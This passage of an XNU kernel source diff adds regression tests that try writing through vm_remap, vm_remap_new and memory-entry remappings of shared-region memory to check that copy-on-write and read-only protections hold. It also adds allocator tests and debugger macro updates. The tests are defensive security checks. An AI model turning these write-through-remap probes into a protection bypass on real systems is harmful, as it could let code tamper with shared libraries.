mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + MACH_PORT_NULL); + T_QUIET; T_ASSERT_EQ(kr, KERN_PROTECTION_FAILURE, "mach_make_memory_entry_64()"); + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); +// T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); + if (depth > 0) { + T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only"); + } + T_PASS("mem_entry() read-only"); + + + /* + * Step 2 - check that one can not share write access with a writable + * mapping in the shared region. + */ + size = 0; + for (address = SHARED_REGION_BASE; + address < SHARED_REGION_BASE + SHARED_REGION_SIZE; + address += size) { + size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &address, + &size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()"); + if (kr == KERN_INVALID_ADDRESS) { + T_SKIP("could not find writable nested mapping"); + T_END; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + address, address + size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + if (depth > 0 && (info.protection & VM_PROT_WRITE)) { + /* nested and writable: bingo! */ + break; + } + } + if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) { + T_SKIP("could not find writable nested mapping"); + T_END; + } + + /* test vm_remap() of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + kr = mach_vm_remap(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()"); + if (!(cur_prot & VM_PROT_WRITE)) { + T_LOG("vm_remap(): 0x%llx not writable %s/%s", + remap_address, prot_str[cur_prot], prot_str[max_prot]); + T_ASSERT_FAIL("vm_remap() remapping not writable"); + } + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap() bypassed copy-on-write"); + } else { + T_PASS("vm_remap() did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + +#if defined(VM_MEMORY_ROSETTA) + if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) { + T_PASS("vm_remap_new() is not present"); + goto skip_vm_remap_new_rw; + } + /* test vm_remap_new() of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + cur_prot = VM_PROT_READ | VM_PROT_WRITE; + max_prot = VM_PROT_READ | VM_PROT_WRITE; + kr = mach_vm_remap_new(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... */ + goto skip_vm_remap_new_rw; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()"); + if (!(cur_prot & VM_PROT_WRITE)) { + T_LOG("vm_remap_new(): 0x%llx not writable %s/%s", + remap_address, prot_str[cur_prot], prot_str[max_prot]); + T_ASSERT_FAIL("vm_remap_new() remapping not writable"); + } + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap_new() bypassed copy-on-write"); + } else { + T_PASS("vm_remap_new() did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); +skip_vm_remap_new_rw: +#else /* defined(VM_MEMORY_ROSETTA) */ + /* pre-BigSur SDK: no vm_remap_new() */ + T_LOG("No vm_remap_new() to test"); +#endif /* defined(VM_MEMORY_ROSETTA) */ + + /* test mach_make_memory_entry_64(VM_SHARE) of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + MACH_PORT_NULL); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... */ + goto skip_mem_entry_vm_share_rw; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + T_QUIET; T_ASSERT_EQ(remap_size, size, "mem_entry(VM_SHARE) should cover whole mapping"); +// T_LOG("AFTER MAKE_MEM_ENTRY(VM_SHARE) 0x%llx...", address); fflush(stdout); fflush(stderr); getchar(); + remap_address = 0; + kr = mach_vm_map(mach_task_self(), + &remap_address, + remap_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + mem_entry, + 0, /* offset */ + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); +// T_LOG("AFTER VM_MAP 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar(); + *(uint32_t *)(uintptr_t)remap_address = before + 1; +// T_LOG("AFTER WRITE 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar(); + after = *(uint32_t *)(uintptr_t)address; + T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write"); + } else { + T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + mach_port_deallocate(mach_task_self(), mem_entry); +skip_mem_entry_vm_share_rw: + + /* test mach_make_memory_entry_64() of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + MACH_PORT_NULL); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64()"); + remap_address = 0; + kr = mach_vm_map(mach_task_self(), + &remap_address, + remap_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + mem_entry, + 0, /* offset */ + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("mem_entry(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + /* check that region is no longer nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + if (before != after) { + if (depth == 0) { + T_PASS("mem_entry() honored copy-on-write"); + } else { + T_FAIL("mem_entry() did not trigger copy-on_write"); + } + } else { + T_FAIL("mem_entry() did not honor copy-on-write"); + } + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_EQ(depth, 0, "no longer nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + mach_port_deallocate(mach_task_self(), mem_entry); +} + T_DECL(copyoverwrite_submap_protection, "test copywrite vm region submap \ protection", T_META_ALL_VALID_ARCHS(true)) { @@ -1029,14 +1701,14 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \ the shared region triggers code-signing violations", T_META_ALL_VALID_ARCHS(true)) { - char *addr; + uint32_t *addr, before, after; int retval; int saved_errno; kern_return_t kr; vm_address_t map_addr, remap_addr; vm_prot_t curprot, maxprot; - addr = (char *)&printf; + addr = (uint32_t *)&printf; #if __has_feature(ptrauth_calls) map_addr = (vm_address_t)(uintptr_t)ptrauth_strip(addr, ptrauth_key_function_pointer); #else /* __has_feature(ptrauth_calls) */ @@ -1052,31 +1724,43 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \ VM_INHERIT_DEFAULT); T_ASSERT_EQ(kr, KERN_SUCCESS, "vm_remap error 0x%x (%s)", kr, mach_error_string(kr)); + before = *addr; retval = mlock(addr, 4096); + after = *addr; if (retval != 0) { saved_errno = errno; T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d", saved_errno, strerror(saved_errno), EACCES); + } else if (after != before) { + T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after); } else { T_PASS("wire shared text"); } - addr = (char *) &fprintf; + addr = (uint32_t *) &fprintf; + before = *addr; retval = mlock(addr, 4096); + after = *addr; if (retval != 0) { saved_errno = errno; T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d", saved_errno, strerror(saved_errno), EACCES); + } else if (after != before) { + T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after); } else { T_PASS("wire shared text"); } - addr = (char *) &testmain_wire_text; + addr = (uint32_t *) &testmain_wire_text; + before = *addr; retval = mlock(addr, 4096); + after = *addr; if (retval != 0) { saved_errno = errno; T_ASSERT_EQ(saved_errno, EACCES, "wire text error return error %d (%s)", saved_errno, strerror(saved_errno)); + } else if (after != before) { + T_ASSERT_FAIL("text changed by wiring at %p 0x%x -> 0x%x", addr, before, after); } else { T_PASS("wire text"); } diff --git a/tests/xnu_quick_test.entitlements b/tests/xnu_quick_test.entitlements deleted file mode 100644 index ada01fb2a..000000000 --- a/tests/xnu_quick_test.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.rootless.datavault.controller.internal - - - diff --git a/tests/xnu_quick_test_entitled.c b/tests/xnu_quick_test_entitled.c deleted file mode 100644 index 24c96e43f..000000000 --- a/tests/xnu_quick_test_entitled.c +++ /dev/null @@ -1,85 +0,0 @@ -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) -#include -#endif - -T_GLOBAL_META( - T_META_NAMESPACE("xnu.quicktest"), - T_META_CHECK_LEAKS(false), - T_META_RUN_CONCURRENTLY(true) - ); - - -/* ************************************************************************************************************** - * Test ioctl system calls. - * ************************************************************************************************************** - */ -T_DECL(ioctl, "Sanity check of ioctl by exercising DKIOCGETBLOCKCOUNT and DKIOCGETBLOCKSIZE", - T_META_ASROOT(true)) -{ - int my_err; - int my_fd = -1; - struct statfs * my_infop; - char * my_ptr; - int my_blksize; - long long my_block_count; - char my_name[MAXPATHLEN]; - -#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) - /* - * this test won't be able to open the root disk device unless CSR is - * disabled or in AppleInternal mode - */ - if (csr_check( CSR_ALLOW_UNRESTRICTED_FS ) && - csr_check( CSR_ALLOW_APPLE_INTERNAL )) { - T_SKIP("System Integrity Protection is enabled"); - } -#endif - - T_SETUPBEGIN; - - T_WITH_ERRNO; - T_ASSERT_GT(getmntinfo( &my_infop, MNT_NOWAIT ), 0, "getmntinfo"); - - /* make this a raw device */ - strlcpy( &my_name[0], &my_infop->f_mntfromname[0], sizeof(my_name)); - if ((my_ptr = strrchr( &my_name[0], '/' )) != 0) { - if (my_ptr[1] != 'r') { - my_ptr[strlen( my_ptr )] = 0x00; - memmove( &my_ptr[2], &my_ptr[1], (strlen( &my_ptr[1] ) + 1)); - my_ptr[1] = 'r'; - } - } - - T_ASSERT_POSIX_SUCCESS(my_fd = open( &my_name[0], O_RDONLY ), "open"); - - T_SETUPEND; - - /* obtain the size of the media (in blocks) */ - T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKCOUNT, &my_block_count ), - "ioctl DKIOCGETBLOCKCOUNT"); - - /* obtain the block size of the media */ - T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKSIZE, &my_blksize ), - "ioctl DKIOCGETBLOCKSIZE"); - - T_LOG( "my_block_count %qd my_blksize %d \n", my_block_count, my_blksize ); - - if (my_err != -1) { - /* make sure the returned data looks somewhat valid */ - T_EXPECT_GE(my_blksize, 0, NULL); - T_EXPECT_LE(my_blksize, 1024 * 1000, NULL); - } - - close( my_fd ); -} diff --git a/tests/zalloc_buddy.c b/tests/zalloc_buddy.c new file mode 100644 index 000000000..76ed25900 --- /dev/null +++ b/tests/zalloc_buddy.c @@ -0,0 +1,131 @@ +#include +#include + +#include +#include + +#undef __abortlike +#define __abortlike +#define panic(fmt, ...) ({ T_FAIL(fmt, __VA_ARGS__); abort(); }) + +#define __security_const_late +#define ZALLOC_TEST 1 +#include "../osfmk/kern/zalloc.c" + +#define ZBA_TEST_SIZE (1ul << 20) + +static void +zba_populate_any(vm_address_t addr, vm_size_t size) +{ + int rc = mprotect((void *)addr, size, PROT_READ | PROT_WRITE); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rc, "mprotect"); +} + +static void +zba_populate_nope(vm_address_t addr, vm_size_t size) +{ +#pragma unused(addr, size) + T_FAIL("Trying to extend the storage"); + T_END; +} + +static void +zba_test_allow_extension(void) +{ + zba_test_info.zbats_populate = zba_populate_any; +} + +static void +zba_test_disallow_extension(void) +{ + zba_test_info.zbats_populate = zba_populate_nope; +} + +static void +zba_test_setup(void) +{ + kern_return_t kr; + int rc; + + kr = vm_allocate(mach_task_self(), &zba_test_info.zbats_base, + ZBA_TEST_SIZE + ZBA_CHUNK_SIZE, VM_FLAGS_ANYWHERE); + T_ASSERT_MACH_SUCCESS(kr, "vm_allocate()"); + + zba_test_info.zbats_base = roundup(zba_test_info.zbats_base, + ZBA_CHUNK_SIZE); + + rc = mprotect(zba_base_header(), ZBA_TEST_SIZE, PROT_NONE); + T_ASSERT_POSIX_SUCCESS(rc, "mprotect"); + + T_LOG("SETUP allocator with base at %p", zba_base_header()); + + zba_test_allow_extension(); + zba_populate(0); + zba_init_chunk(0); +} + +T_DECL(zone_buddy_allocator_encodings, "test the buddy allocator formulas") +{ + uint8_t bits[sizeof(zba_base_header()->zbah_bits)] = { }; + + for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) { + for (vm_address_t pos = 0; pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE << o) { + struct zone_bits_chain *zbc; + size_t node = zba_node(pos, o); + + zbc = zba_chain_for_node(NULL, node, o); + T_QUIET; T_ASSERT_EQ(pos, (vm_offset_t)zbc, + "zba_node / zba_chain_for_node is reversible (pos: %lx, node %zd)", + pos, node); + + + if (o == 0) { + // leaf nodes aren't represented in the bitmap + continue; + } + T_QUIET; T_ASSERT_LT(node, 8 * sizeof(bits), "fits in bitfield: %zd", pos); + T_QUIET; T_ASSERT_EQ(0, bits[node / 8] & (1 << (node % 8)), "never seen"); + bits[node / 8] ^= 1 << (node % 8); + } + } + + T_PASS("zba_node, zba_chain_for_node look sane"); +} + +T_DECL(zone_buddy_allocator, "test the zone bits setup") +{ + vm_address_t base, pos; + + zba_test_setup(); + + zba_test_disallow_extension(); + + base = (vm_address_t)zba_slot_base(); + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc"); + *(uint64_t *)(base + pos) = ~0ull; + } + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + zba_free(base + pos, 0); + } + + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc"); + *(uint64_t *)(base + pos) = ~0ull; + } + zba_test_allow_extension(); + + base += ZBA_CHUNK_SIZE; + for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc"); + *(uint64_t *)(base + pos) = ~0ull; + } + + for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + zba_free(base + pos, 0); + } + base -= ZBA_CHUNK_SIZE; + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + zba_free(base + pos, 0); + } +} diff --git a/tools/lldbmacros/Makefile b/tools/lldbmacros/Makefile index f00ff970a..f20f231da 100644 --- a/tools/lldbmacros/Makefile +++ b/tools/lldbmacros/Makefile @@ -79,7 +79,8 @@ LLDBMACROS_PYTHON_FILES = $(LLDBMACROS_USERDEBUG_FILES) \ pgtrace.py \ xnutriage.py \ zonetriage.py \ - sysreg.py + sysreg.py \ + counter.py ifneq ($(PLATFORM),MacOSX) LLDBMACROS_PYTHON_FILES+= \ diff --git a/tools/lldbmacros/core/kernelcore.py b/tools/lldbmacros/core/kernelcore.py index d21b5c912..0168046c9 100755 --- a/tools/lldbmacros/core/kernelcore.py +++ b/tools/lldbmacros/core/kernelcore.py @@ -314,6 +314,7 @@ class KernelTarget(object): self._thread_groups = [] self._allproc = [] self._terminated_tasks_list = [] + self._terminated_threads_list = [] self._zones_list = [] self._zombproc_list = [] self._kernel_types_cache = {} #this will cache the Type objects as and when requested. @@ -591,6 +592,17 @@ class KernelTarget(object): caching.SaveDynamicCacheData("kern._terminated_tasks_list", self._terminated_tasks_list) return self._terminated_tasks_list + if name == 'terminated_threads' : + self._terminated_threads_list = caching.GetDynamicCacheData("kern._terminated_threads_list", []) + if len(self._terminated_threads_list) > 0 : return self._terminated_threads_list + thread_queue_head = self.GetGlobalVariable('terminated_threads') + thread_type = LazyTarget.GetTarget().FindFirstType('thread') + thread_ptr_type = thread_type.GetPointerType() + for trd in IterateQueue(thread_queue_head, thread_ptr_type, 'threads'): + self._terminated_threads_list.append(trd) + caching.SaveDynamicCacheData("kern._terminated_threads_list", self._terminated_threads_list) + return self._terminated_threads_list + if name == 'procs' : self._allproc = caching.GetDynamicCacheData("kern._allproc", []) if len(self._allproc) > 0 : return self._allproc diff --git a/tools/lldbmacros/core/syntax_checker.py b/tools/lldbmacros/core/syntax_checker.py index 02ec68eb5..916f66a07 100755 --- a/tools/lldbmacros/core/syntax_checker.py +++ b/tools/lldbmacros/core/syntax_checker.py @@ -15,6 +15,11 @@ import re tabs_search_rex = re.compile("^\s*\t+",re.MULTILINE|re.DOTALL) +def find_non_ascii(s): + for c in s: + if ord(c) >= 0x80: return True + return False + if __name__ == "__main__": if len(sys.argv) < 2: print >>sys.stderr, "Error: Unknown arguments" @@ -30,13 +35,16 @@ if __name__ == "__main__": fh = open(fname) strdata = fh.readlines() lineno = 0 - tab_check_status = True + syntax_fail = False for linedata in strdata: lineno += 1 if len(tabs_search_rex.findall(linedata)) > 0 : print >>sys.stderr, "Error: Found a TAB character at %s:%d" % (fname, lineno) - tab_check_status = False - if tab_check_status == False: + syntax_fail = True + if find_non_ascii(linedata): + print >>sys.stderr, "Error: Found a non ascii character at %s:%d" % (fname, lineno) + syntax_fail = True + if syntax_fail: print >>sys.stderr, "Error: Syntax check failed. Please fix the errors and try again." sys.exit(1) #now check for error in compilation diff --git a/tools/lldbmacros/counter.py b/tools/lldbmacros/counter.py new file mode 100755 index 000000000..200c33727 --- /dev/null +++ b/tools/lldbmacros/counter.py @@ -0,0 +1,24 @@ +from memory import IterateZPerCPU +from xnu import * + +@lldb_type_summary(['scalable_counter_t']) +@header("Counter Value\n-------------") +def GetSimpleCounter(counter): + """ Prints out the value of a percpu counter + params: counter: value - value object representing counter + returns: str - THe value of the counter as a string. + """ + val = 0 + for v in IterateZPerCPU(counter, "uint64_t *"): + val += dereference(v) + return str(val) + +@lldb_command('showcounter') +def ShowSimpleCounter(cmd_args=None): + """ Show the value of a percpu counter. + Usage: showcounter
+ """ + if not cmd_args: + raise ArgumentError("Please specify the address of the counter you want to read.") + return + print GetSimpleCounter(kern.GetValueFromAddress(cmd_args[0], "scalable_counter_t")) diff --git a/tools/lldbmacros/ipc.py b/tools/lldbmacros/ipc.py index 4ae6086e6..7f7c65163 100755 --- a/tools/lldbmacros/ipc.py +++ b/tools/lldbmacros/ipc.py @@ -1242,14 +1242,14 @@ def IterateAllPorts(tasklist, func, ctx, include_psets, follow_busyports, should func(t, space, ctx, taskports_idx, 0, t.itk_debug_control, 17) if unsigned(t.itk_task_access) > 0: func(t, space, ctx, taskports_idx, 0, t.itk_task_access, 17) - if unsigned(t.itk_self[1]) > 0: ## task read port - func(t, space, ctx, taskports_idx, 0, t.itk_self[1], 17) - if unsigned(t.itk_self[2]) > 0: ## task inspect port - func(t, space, ctx, taskports_idx, 0, t.itk_self[2], 17) + if unsigned(t.itk_task_ports[1]) > 0: ## task read port + func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[1], 17) + if unsigned(t.itk_task_ports[2]) > 0: ## task inspect port + func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[2], 17) ## Task name port (not a send right, just a naked ref); TASK_FLAVOR_NAME = 3 - if unsigned(t.itk_self[3]) > 0: - func(t, space, ctx, taskports_idx, 0, t.itk_self[3], 0) + if unsigned(t.itk_task_ports[3]) > 0: + func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[3], 0) ## task resume port is a receive right to resume the task if unsigned(t.itk_resume) > 0: diff --git a/tools/lldbmacros/kasan.py b/tools/lldbmacros/kasan.py index 94f133ccd..7a95127e4 100755 --- a/tools/lldbmacros/kasan.py +++ b/tools/lldbmacros/kasan.py @@ -82,7 +82,7 @@ def print_alloc_free_entry(addr, orig_ptr): leftrz = 16 else: alloc_type = "zone" - leftrz = unsigned(zone.kasan_redzone) + leftrz = unsigned(zone.z_kasan_redzone) else: alloc_type = "kalloc" if asz - usz >= 2*pgsz: diff --git a/tools/lldbmacros/kcdata.py b/tools/lldbmacros/kcdata.py index a17eec8b2..08aa8dbcb 100755 --- a/tools/lldbmacros/kcdata.py +++ b/tools/lldbmacros/kcdata.py @@ -16,6 +16,10 @@ import contextlib import base64 import zlib +# can be removed once we move to Python3.1+ +from future.utils.surrogateescape import register_surrogateescape +register_surrogateescape() + class Globals(object): pass G = Globals() @@ -165,6 +169,13 @@ KNOWN_TOPLEVEL_CONTAINER_TYPES = () def enum(**args): return type('enum', (), args) +# +# Decode bytes as UTF-8, using surrogateescape if there are invalid UTF-8 +# sequences; see PEP-383 +# +def BytesToString(b): + return b.decode('utf-8', errors="surrogateescape") + KCSUBTYPE_TYPE = enum(KC_ST_CHAR=1, KC_ST_INT8=2, KC_ST_UINT8=3, KC_ST_INT16=4, KC_ST_UINT16=5, KC_ST_INT32=6, KC_ST_UINT32=7, KC_ST_INT64=8, KC_ST_UINT64=9) @@ -210,7 +221,7 @@ class KCSubTypeElement(object): @staticmethod def FromBinaryTypeData(byte_data): (st_flag, st_type, st_offset, st_size, st_name) = struct.unpack_from('=BBHI32s', byte_data) - st_name = st_name.rstrip('\x00') + st_name = BytesToString(st_name.rstrip('\0')) return KCSubTypeElement(st_name, st_type, st_size, st_offset, st_flag) @staticmethod @@ -238,7 +249,10 @@ class KCSubTypeElement(object): return self.totalsize def GetValueAsString(self, base_data, array_pos=0): - return str(self.GetValue(base_data, array_pos)) + v = self.GetValue(base_data, array_pos) + if isinstance(v, bytes): + return BytesToString(v) + return str(v) def GetValue(self, base_data, array_pos=0): return struct.unpack_from(self.unpack_fmt, base_data[self.offset + (array_pos * self.size):])[0] @@ -499,14 +513,14 @@ class KCObject(object): elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT32_DESC'): self.is_naked_type = True u_d = 